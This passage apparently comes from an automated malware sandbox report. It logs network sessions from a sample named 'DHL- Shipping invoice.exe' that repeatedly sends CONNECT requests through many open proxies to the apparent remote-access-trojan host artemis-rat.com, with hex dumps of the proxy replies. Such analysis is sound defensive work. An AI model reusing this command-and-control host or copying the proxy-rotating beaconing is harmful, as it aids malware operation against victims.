6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi
                            Mar 12, 2024 08:37:04.849334955 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            244192.168.2.45075677.77.64.11631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.857264042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            245192.168.2.45100245.79.230.2344436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.873013020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            246192.168.2.45100545.79.230.2344436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.875444889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            247192.168.2.45100645.79.230.2344436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.877906084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            248192.168.2.45100845.79.230.2344436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.879021883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            249192.168.2.45083246.35.9.110806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.880525112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            250192.168.2.450905104.16.105.182806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.884860992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.972261906 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            251192.168.2.450918104.20.178.166806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.891390085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.979000092 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            252192.168.2.45089238.162.24.24231286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.892323971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.192262888 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            253192.168.2.449898212.88.109.8931286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.902534008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.062397003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.061474085 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            254192.168.2.45086351.89.173.40516126484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.902837992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            255192.168.2.45086951.15.242.20288886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.925617933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            256192.168.2.450913207.244.255.174197706484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.925801039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.265367985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.609179020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            257192.168.2.450041107.180.90.248403306484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.927995920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.062503099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.063056946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.074186087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.062577009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:36.062388897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:48.077918053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:12.249764919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            258192.168.2.450930104.18.81.76806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.928334951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.016074896 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            259192.168.2.450962104.21.124.121806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.929797888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.016940117 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            260192.168.2.450233104.37.135.14541456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.932924986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            261192.168.2.450968104.19.124.112806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.935424089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.022325039 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            262192.168.2.450565117.160.250.16399906484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.936249971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.479942083 CET303INHTTP/1.1 400 Bad Request
                            Server: openresty
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 154
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            263192.168.2.450974104.20.75.31806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.942269087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.029433966 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            264192.168.2.450818105.235.197.162540666484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.945152044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            265192.168.2.450000168.232.213.941536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.947545052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            266192.168.2.450800125.228.94.19941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.949075937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            267192.168.2.450773202.144.134.15056786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.958724022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            268192.168.2.451001104.19.171.188806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.961074114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.048250914 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            269192.168.2.45096751.79.87.144225006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.962301970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
